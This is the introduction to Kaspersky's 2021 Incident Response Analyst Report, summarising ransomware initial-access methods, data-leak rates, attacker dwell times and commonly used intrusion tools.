Introduction
In 2021, although the main threat trends remained, our service approach moved to near-complete – 98% of all cases – remote delivery. Kaspersky Digital Forensics and Incident Response operations are handled by our Global Emergency Response Team (GERT)2 with experts in Europe, Asia, South and North America, the Middle East and Africa.
The Incident Response Analyst Report provides insights into incident investigation services conducted by
Kaspersky in 2021. We deliver a range of services to help organizations when they are in need: incident response, digital forensics and malware analysis. Data in the report comes from our daily practices with organizations seeking assistance with full-blown incident response or complimentary expert activities for their internal incident response teams.1
According to the research data during attacks associated with ransomware, the same basic methods that are inherent in other types of attacks were used as the initial attack vector. Exploiting vulnerabilities and previously compromised user accounts were used in 37.5% of cases, while malicious mail was used in every fourth case with cryptors.
However, in a number of attacks, the adversary’s goal was not extortion or data encryption, but company data, personal data, intellectual property, and other sensitive information.
Managing the damage from these kinds of attacks is almost impossible. It leads to reputational loss as well as potential penalties from regulators and lawsuits. All this is used as an additional incentive for blackmail.
We observed data leakage in 10% of cases with cryptors. In addition, the purpose of using cryptors is sometimes to hide the initial traces of an attack and complicate incident investigations.
Analyzing the duration of attacks with cryptors, it can be concluded that a significant period of time passes between the initial compromise of the network and the final stage of the attack. In 62.5% of attacks, attackers spend more than a month inside the network before encrypting data. A properly organized process of attack detection and response reduces the time it takes to detect attackers in the network and prevent final damage.
After the initial penetration, attackers use PowerShell to collect data, Mimikatz to escalate privileges, PsExec to execute commands remotely or frameworks like Cobalt Strike for all stages of attack.
